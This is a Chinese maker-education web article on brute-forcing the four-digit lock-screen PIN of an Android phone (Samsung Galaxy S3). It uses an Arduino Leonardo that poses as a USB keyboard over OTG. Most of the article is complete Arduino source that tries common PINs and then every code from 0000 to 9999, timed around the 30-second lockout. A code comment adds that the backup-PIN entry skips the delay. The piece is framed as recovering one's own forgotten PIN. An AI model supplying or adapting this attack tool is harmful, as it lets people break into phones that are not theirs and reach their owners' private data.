奥松智能丨专注于3-18岁青少儿人工智能科创教育

当前位置：首页 < 创客利器 < 【创客学堂】神技能！通过arduino暴力破解Android手机...

【创客学堂】神技能！通过arduino暴力破解Android手机

编辑：Jason 2014-12-19 浏览次数：1203

使用过安卓手机的小伙伴们肯定会有些惨痛经历，经常会忘记手机解锁图形和PIN码，但如果通过Root等方式破解手机恐怕再也无法得到官方保修，这里就介绍一种方法安全的破解它！

三星Galaxy S3手机在输错5次PIN码后，会要求等待30s然后重新输入，幸运的是，每次输错都会要求等待30s，这等待时间并不会更改，这就给了hack的机会。
因为Arduino Leonardo可以作为HID设备模拟键盘通过USB OTG连接到手机，在这里我就选用了Leonardo，文章末尾有详细的代码。为了减少破解时间，可以把自己常用的密码或者数字组合优先测试。

当然，三星Galaxy S3手机的PIN码只有四位，如果从0000一直尝试到9999大概只需要16个小时，如果你的手机碰巧是小米手机，PIN码又碰巧设了17位，那你就果断Root吧~~

代码如下：

/*
Brute forcing Android 4 Digit PIN's
To run the whole range it will take upwards of 16 hours because of
the 30 second delay after 5 bad inputs
Intrestingly, if the target phone has the pattern enabled
and the backup PIN set, the backup PIN entry system doesn't force the 30 second delay after
invalid attempts
http://blog.infosecsee.com */
const int buttonPin = 2; // input pin for pushbutton
int previousButtonState = HIGH; // for checking the state of a pushButton
int counter = 0; // button push counter
int check = 0;
void setup() {
pinMode(buttonPin, INPUT);
Keyboard.begin();
}
void loop() {
int buttonState = digitalRead(buttonPin);
if ((buttonState != previousButtonState) && (buttonState == HIGH)) {
Mouse.move(25, 50, 0);
String three = "000";
String two = "00";
String one = "0";
while(counter < 10000){
delay(1000);
while (check < 1){
Keyboard.println("1234");
delay(500);
Keyboard.println("1111");
delay(500);
Keyboard.println("0000");
delay(500);
Keyboard.println("1212");
delay(500);
Keyboard.println("7777");
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
Keyboard.println("1004");
delay(500);
Keyboard.println("2000");
delay(500);
Keyboard.println("4444");
delay(500);
Keyboard.println("2222");
delay(500);
Keyboard.println("6969");
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
Mouse.move(25, 50, 0);
Keyboard.println("9999");
delay(500);
Keyboard.println("3333");
delay(500);
Keyboard.println("5555");
delay(500);
Keyboard.println("6666");
delay(500);
Keyboard.println("1122");
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
Keyboard.println("1313");
delay(500);
Keyboard.println("8888");
delay(500);
Keyboard.println("4321");
delay(500);
Keyboard.println("2001");
delay(500);
Keyboard.println("1010");
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
check++;}
if (counter < 10 && check == 1) {
Keyboard.println(three + counter);
delay(500);
counter++;
Keyboard.println(three + counter);
delay(500);
counter++;
Keyboard.println(three + counter);
delay(500);
counter++;
Keyboard.println(three + counter);
delay(500);
counter++;
Keyboard.println(three + counter);
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
}
else if (counter < 100){
Keyboard.println(two + counter);
delay(500);
counter++;
Keyboard.println(two + counter);
delay(500);
counter++;
Keyboard.println(two + counter);
delay(500);
counter++;
Keyboard.println(two + counter);
delay(500);
counter++;
Keyboard.println(two + counter);
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
}
else if (counter < 1000){
Keyboard.println(one + counter);
delay(500);
counter++;
Keyboard.println(one + counter);
delay(500);
counter++;
Keyboard.println(one + counter);
delay(500);
counter++;
Keyboard.println(one + counter);
delay(500);
counter++;
Keyboard.println(one + counter);
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
}
else {
Keyboard.println(counter);
delay(500);
counter++;
Keyboard.println(counter);
delay(500);
counter++;
Keyboard.println(counter);
delay(500);
counter++;
Keyboard.println(counter);
delay(500);
counter++;
Keyboard.println(counter);
delay(500);
Keyboard.println("");
Keyboard.println("");
delay(30000);
Mouse.move(25, 50, 0);
}
}
}
previousButtonState = buttonState;
}